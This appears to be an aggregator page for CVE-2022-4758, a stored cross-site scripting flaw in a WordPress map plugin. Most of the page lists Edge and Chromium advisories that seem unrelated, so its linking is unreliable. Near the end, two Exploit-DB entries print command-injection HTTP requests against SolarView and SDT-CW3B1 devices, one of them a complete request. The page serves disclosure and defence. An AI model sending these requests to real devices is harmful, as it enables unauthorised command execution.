CVE-2022-4758
published 2023-01-23CVE-2022-4758: The 10WebMapBuilder WordPress plugin before 1.0.72 does not validate and escape some of its shortcode attributes before outputting them back in the page, which…
PriorityP423medium5.4CVSS 3.1
AVNACLPRLUIRSCCLILAN
EPSS
0.47%
37.2th percentile
The 10WebMapBuilder WordPress plugin before 1.0.72 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| 10web | map_builder_for_google_maps | < 1.0.72 | 1.0.72 |
| msrc | microsoft_edge | — | — |
CVSS provenance
nvdv3.15.4MEDIUMCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
vendor_msrc9.6CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-mmm6-292h-j64g: The 10WebMapBuilder WordPress plugin before 1
ghsa_unreviewed·2023-01-23
CVE-2022-4758 [MEDIUM] CWE-79 GHSA-mmm6-292h-j64g: The 10WebMapBuilder WordPress plugin before 1
The 10WebMapBuilder WordPress plugin before 1.0.72 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.
Microsoft
Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability
vendor_msrc·2022-02-08·CVSS 7.7
CVE-2022-23263 [HIGH] Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability
Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
FAQ: According to the CVSS metric, the attack complexity is high (AC:H). What does that mean for this vulnerability?
Successful exploitation of this vulnerability requires an attacker to win a race condition.
FAQ: According to the CVSS metric, a successful exploitation could lead to a scope change (S:C). What does this mean for this vulnerability?
This vulnerability could lead to a browser sandbox escape.
Microsoft Edge (Chromium-based): Microsoft Edge (Chromium-based)
Microsoft: Microsoft
Customer Action Required: Yes
Impact: Elevation of Privilege
Exploit S
Microsoft
Chromium: CVE-2022-0464 Use after free in Accessibility
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0464 [HIGH] Chromium: CVE-2022-0464 Use after free in Accessibility
Chromium: CVE-2022-0464 Use after free in Accessibility
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the browser?
In
Microsoft
Chromium: CVE-2022-0608 Integer overflow in Mojo
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0608 [HIGH] Chromium: CVE-2022-0608 Integer overflow in Mojo
Chromium: CVE-2022-0608 Integer overflow in Mojo
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.55
2/15/2022
98.0.4758.102
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the browser?
In your
Microsoft
Chromium: CVE-2022-0462 Inappropriate implementation in Scroll
vendor_msrc·2022-02-08·CVSS 6.5
CVE-2022-0462 [MEDIUM] Chromium: CVE-2022-0462 Inappropriate implementation in Scroll
Chromium: CVE-2022-0462 Inappropriate implementation in Scroll
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the brows
Microsoft
Chromium: CVE-2022-0610 Inappropriate implementation in Gamepad API
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0610 [HIGH] Chromium: CVE-2022-0610 Inappropriate implementation in Gamepad API
Chromium: CVE-2022-0610 Inappropriate implementation in Gamepad API
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.55
2/15/2022
98.0.4758.102
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of th
Microsoft
Chromium: CVE-2022-0607 Use after free in GPU
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0607 [HIGH] Chromium: CVE-2022-0607 Use after free in GPU
Chromium: CVE-2022-0607 Use after free in GPU
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.55
2/15/2022
98.0.4758.102
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the browser?
In your Mi
Microsoft
Chromium: CVE-2022-0463 Use after free in Accessibility
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0463 [HIGH] Chromium: CVE-2022-0463 Use after free in Accessibility
Chromium: CVE-2022-0463 Use after free in Accessibility
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the browser?
In
Microsoft
Chromium: CVE-2022-0603 Use after free in File Manager
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0603 [HIGH] Chromium: CVE-2022-0603 Use after free in File Manager
Chromium: CVE-2022-0603 Use after free in File Manager
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.55
2/15/2022
98.0.4758.102
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the browser?
I
Microsoft
Chromium: CVE-2022-0467 Inappropriate implementation in Pointer Lock
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0467 [HIGH] Chromium: CVE-2022-0467 Inappropriate implementation in Pointer Lock
Chromium: CVE-2022-0467 Inappropriate implementation in Pointer Lock
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the
Microsoft
Chromium: CVE-2022-0456 Use after free in Web Search
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0456 [HIGH] Chromium: CVE-2022-0456 Use after free in Web Search
Chromium: CVE-2022-0456 Use after free in Web Search
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the browser?
In yo
Microsoft
Chromium: CVE-2022-0458 Use after free in Thumbnail Tab Strip
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0458 [HIGH] Chromium: CVE-2022-0458 Use after free in Thumbnail Tab Strip
Chromium: CVE-2022-0458 Use after free in Thumbnail Tab Strip
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the browse
Microsoft
Microsoft Edge (Chromium-based) Spoofing Vulnerability
vendor_msrc·2022-02-08·CVSS 4.7
CVE-2022-23264 [MEDIUM] Microsoft Edge (Chromium-based) Spoofing Vulnerability
Microsoft Edge (Chromium-based) Spoofing Vulnerability
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.50
2/10/2022
98.0.4758.80
Microsoft Edge (Chromium-based): Microsoft Edge (Chromium-based)
Microsoft: Microsoft
Customer Action Required: Yes
Impact: Spoofing
Exploit Status: Publicly Disclosed:No;Exploited:No;Latest Software Release:Exploitation Less Likely;Older Software Release:Exploitation Less Likely;DOS:N/A
Microsoft
Chromium: CVE-2022-0606 Use after free in ANGLE
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0606 [HIGH] Chromium: CVE-2022-0606 Use after free in ANGLE
Chromium: CVE-2022-0606 Use after free in ANGLE
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.55
2/15/2022
98.0.4758.102
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the browser?
In your
Microsoft
Chromium: CVE-2022-0461 Policy bypass in COOP
vendor_msrc·2022-02-08·CVSS 6.5
CVE-2022-0461 [MEDIUM] Chromium: CVE-2022-0461 Policy bypass in COOP
Chromium: CVE-2022-0461 Policy bypass in COOP
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the browser?
In your Micr
Microsoft
Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability
vendor_msrc·2022-02-08·CVSS 6.3
CVE-2022-23262 [MEDIUM] Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability
Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
Microsoft Edge (Chromium-based): Microsoft Edge (Chromium-based)
Microsoft: Microsoft
Customer Action Required: Yes
Impact: Elevation of Privilege
Exploit Status: Publicly Disclosed:No;Exploited:No;Latest Software Release:Exploitation Less Likely;Older Software Release:Exploitation Less Likely;DOS:N/A
Remediation: Release Notes
Microsoft
Chromium: CVE-2022-0452 Use after free in Safe Browsing
vendor_msrc·2022-02-08·CVSS 9.6
CVE-2022-0452 [CRITICAL] Chromium: CVE-2022-0452 Use after free in Safe Browsing
Chromium: CVE-2022-0452 Use after free in Safe Browsing
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the browser?
In
Microsoft
Chromium: CVE-2022-0468 Use after free in Payments
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0468 [HIGH] Chromium: CVE-2022-0468 Use after free in Payments
Chromium: CVE-2022-0468 Use after free in Payments
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the browser?
In your
Microsoft
Chromium: CVE-2022-0454 Heap buffer overflow in ANGLE
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0454 [HIGH] Chromium: CVE-2022-0454 Heap buffer overflow in ANGLE
Chromium: CVE-2022-0454 Heap buffer overflow in ANGLE
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the browser?
In y
Microsoft
Chromium: CVE-2022-0459 Use after free in Screen Capture
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0459 [HIGH] Chromium: CVE-2022-0459 Use after free in Screen Capture
Chromium: CVE-2022-0459 Use after free in Screen Capture
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the browser?
I
Microsoft
Chromium: CVE-2022-0457 Type Confusion in V8
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0457 [HIGH] Chromium: CVE-2022-0457 Type Confusion in V8
Chromium: CVE-2022-0457 Type Confusion in V8
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the browser?
In your Micro
Microsoft
Microsoft Edge (Chromium-based) Tampering Vulnerability
vendor_msrc·2022-02-08·CVSS 5.3
CVE-2022-23261 [MEDIUM] Microsoft Edge (Chromium-based) Tampering Vulnerability
Microsoft Edge (Chromium-based) Tampering Vulnerability
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
Microsoft Edge (Chromium-based): Microsoft Edge (Chromium-based)
Microsoft: Microsoft
Customer Action Required: Yes
Impact: Tampering
Exploit Status: Publicly Disclosed:No;Exploited:No;Latest Software Release:Exploitation Less Likely;Older Software Release:Exploitation Less Likely;DOS:N/A
Remediation: Release Notes
Microsoft
Chromium: CVE-2022-0465 Use after free in Extensions
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0465 [HIGH] Chromium: CVE-2022-0465 Use after free in Extensions
Chromium: CVE-2022-0465 Use after free in Extensions
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the browser?
In yo
Microsoft
Chromium: CVE-2022-0605 Use after free in Webstore API
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0605 [HIGH] Chromium: CVE-2022-0605 Use after free in Webstore API
Chromium: CVE-2022-0605 Use after free in Webstore API
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.55
2/15/2022
98.0.4758.102
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the browser?
I
Microsoft
Chromium: CVE-2022-0604 Heap buffer overflow in Tab Groups
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0604 [HIGH] Chromium: CVE-2022-0604 Heap buffer overflow in Tab Groups
Chromium: CVE-2022-0604 Heap buffer overflow in Tab Groups
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.55
2/15/2022
98.0.4758.102
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the browser
Microsoft
Chromium: CVE-2022-0466 Inappropriate implementation in Extensions Platform
vendor_msrc·2022-02-08·CVSS 9.6
CVE-2022-0466 [CRITICAL] Chromium: CVE-2022-0466 Inappropriate implementation in Extensions Platform
Chromium: CVE-2022-0466 Inappropriate implementation in Extensions Platform
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version
Microsoft
Chromium: CVE-2022-0470 Out of bounds memory access in V8
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0470 [HIGH] Chromium: CVE-2022-0470 Out of bounds memory access in V8
Chromium: CVE-2022-0470 Out of bounds memory access in V8
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the browser?
Microsoft
Chromium: CVE-2022-0455 Inappropriate implementation in Full Screen Mode
vendor_msrc·2022-02-08·CVSS 6.5
CVE-2022-0455 [MEDIUM] Chromium: CVE-2022-0455 Inappropriate implementation in Full Screen Mode
Chromium: CVE-2022-0455 Inappropriate implementation in Full Screen Mode
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of
Microsoft
Chromium: CVE-2022-0469 Use after free in Cast
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0469 [HIGH] Chromium: CVE-2022-0469 Use after free in Cast
Chromium: CVE-2022-0469 Use after free in Cast
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the browser?
In your Mic
Microsoft
Chromium: CVE-2022-0460 Use after free in Window Dialog
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0460 [HIGH] Chromium: CVE-2022-0460 Use after free in Window Dialog
Chromium: CVE-2022-0460 Use after free in Window Dialog
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the browser?
In
Microsoft
Chromium: CVE-2022-0609 Use after free in Animation
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0609 [HIGH] Chromium: CVE-2022-0609 Use after free in Animation
Chromium: CVE-2022-0609 Use after free in Animation
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information. Google is aware of reports that an exploit for CVE-2022-0609 exists in the wild.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.55
2/15/2022
98.0.4758.102
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromiu
Microsoft
Chromium: CVE-2022-0453 Use after free in Reader Mode
vendor_msrc·2022-02-08·CVSS 8.8
CVE-2022-0453 [HIGH] Chromium: CVE-2022-0453 Use after free in Reader Mode
Chromium: CVE-2022-0453 Use after free in Reader Mode
Description: This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information.
FAQ: What is the version information for this release?
Microsoft Edge Version
Date Released
Based on Chromium Version
98.0.1108.43
2/3/2022
98.0.4758.80
FAQ: Why is this Chrome CVE included in the Security Update Guide?
The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.
How can I see the version of the browser?
In y
No detection rules found.
Exploit-DB
SolarView Compact 6.0 - OS Command Injection
exploitdb·2022-05-17·CVSS 9.8
CVE-2022-29303 [CRITICAL] SolarView Compact 6.0 - OS Command Injection
SolarView Compact 6.0 - OS Command Injection
---
# Exploit Title: SolarView Compact 6.0 - OS Command Injection
# Date: 2022-05-15
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: ver.6.00
# Vendor home page : https://www.contec.com/
# Authentication Required: No
# CVE : CVE-2022-29303
# Tested on: Windows
# Exploit
# HTTP Request :
POST /conf_mail.php HTTP/1.1
Host: HOST_IP
Content-Length: 77
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://HOST_IP
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exc
Exploit-DB
SDT-CW3B1 1.1.0 - OS Command Injection
exploitdb·2022-05-17·CVSS 9.8
CVE-2021-46422 [CRITICAL] SDT-CW3B1 1.1.0 - OS Command Injection
SDT-CW3B1 1.1.0 - OS Command Injection
---
# Exploit Title: SDT-CW3B1 1.1.0 - OS command injection
# Date: 2022-05-12
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: 1.0.0
# Vendor home page : http://telesquare.co.kr/
# Authentication Required: No
# CVE : CVE-2021-46422
# Tested on: Windows
# HTTP Request
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1
Host: IP_HERE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: */*
Referer: http:// IP_HERE /admin/system_command.shtml
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
No writeups or analysis indexed.
2023-01-23
Published